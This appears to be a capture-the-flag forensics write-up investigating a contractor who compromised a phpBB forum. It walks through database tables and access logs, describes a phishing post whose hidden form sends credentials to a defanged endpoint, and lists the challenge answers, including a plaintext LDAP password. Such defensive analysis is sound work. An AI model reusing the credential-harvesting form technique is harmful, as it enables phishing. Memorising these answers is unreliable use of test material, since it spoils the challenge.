An external contractor has accessed the internal forum here at Forela via the Guest Wi-Fi, and they appear to have stolen credentials for the administrative user! We have attached some logs from the forum and a full database dump in sqlite3 format to help you in your investigation.
Misc Info:
IP: 10.10.0.27
Register IP: 10.10.0.78
SID: 041ca559047513ba2267dfc066187582
Credential Stealer: hxxp://10[.]10.0.78/update[.]php
Timeline:
25/04/2023:11:07:39 – First activity seen in access.log for IP
25/04/2023:11:07:47 – User registered
26/04/2023 10:53:51 – Contractor added to admin group
26/04/2023:11:01:38 – DB downloaded
Task 1
What was the username of the external contractor?
The first thing I did was look at the DB structure to get an understanding of the different tables available.
Some things I see that might be of note from an initial glance:
phpbb_log , login_attempts, posts, users, sessions, search_results
To start off, I looked at the phpbb_users table. I did already look through the access.log file so I have some idea what I am looking for, but we will see if we can find a contractor account without any additional correlation for the time being.
Here we can see two contractor[.]net accounts. We also get some info regarding the registration time, last post time, last page visited, and the IP of the user.
Task 2
What IP address did the contractor use to create their account?
It isn’t quite clear if user_ip is the IP used to create the account or just the last IP to log in, so I went to the access.log to see if I could find some other info
In the Access.log file we can see post activity to /ucp.php?mode=register&sid=a6ef84d1dbe44514d987667afd8cf50
The IP making this request is the same we see in the DB.
Task 3
What is the post_id of the malicious post that the contractor made?
I switched over to the php_bb_posts table for this one
This is pretty straightforward since there is only one post by the IP we are looking for, but we can also see the post text, so I will look into that and get an understanding of what is going on.
I want to make this a little more readable so I will replace > with a > followed by a newline.
This is my lazy way of quickly formatting html
Just doing this allows me to quickly get a decently readable file.
I also need to change the color scheme quickly.
So, without diving too much into this right now, I can see this is definitely abnormal for a forum post, we will submit our answer and come back to this later.
Task 4
What is the full URI that the credential stealer sends its data to?
In this post, we appear to have a html file. Now, what bad things might happen on an html file?
My first thought is running a malicious script, so let’s look for any scripts that are doing weird things.
I found this script called sethidden that seems to be taking a token.
We can also see some hidden iframes in here. This looks like it’s going to be a phishing post, but let’s keep digging.
In order for the sethidden script to run, it needs to be called, so let’s look through the script for any other instances of sethidden
Here we can see a button with the onclick action of calling set hidden. It doesn’t show up anywhere else in the page, so this is how it will be used.
Above this, we see a username and password field as well as a form that posts the data to hxxp://10[.]10.0.78/update[.]php, so this adds up with the theory of a phishing page and gives us the answer of what URI the credential stealer is sending data to.
Side Note: If you want to be super cheeky and play the CTF game you can just regex match the answer, but that’s no fun
Task 5
When did the contractor log into the forum as the administrator? (UTC)
I found this in the access.logs by looking for admin activity from the malicious IP.
The timezone is +1 so just subtract an hour from the displayed time
Task 6
In the forum there are plaintext credentials for the LDAP connection, what is the password?
Here I opened up the phpbb_config table and scrolled through until I saw a field that looked like a password field and I came across ldap_password
Passw0rd1
Task 7
What is the user agent of the Administrator user?
For this section, I looked up the IP of the admin user and then correlated it to the access.log file
Here we can see the user agent used by this account
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Task 8
What time did the contractor add themselves to the Administrator group? (UTC)
We can look at the phpbb_log file to see the logs for user added to administrators under the “LOG_USERS_ADDED” log operation.
We get the epoch timestamp, so we just need to convert this,
Ref: https://www.epochconverter.com/
April 26, 2023 10:53:51 AM
26/04/2023 10:53:51
Task 9
What time did the contractor download the database backup? (UTC)
If we go back to the access.log file, we can see a log for getting /store/backup_1682506471_dcsr71p7fyijoyq8.sql.gz at 26/Apr/2023:12:01:38 +0100
Again, we just need to adjust this to be in UTC so -1 hr
26/04/2023 11:01:38
Task 10
What was the size in bytes of the database backup as stated by access.log?
We have this in the same log we just looked at, 34707
Killian Sherer 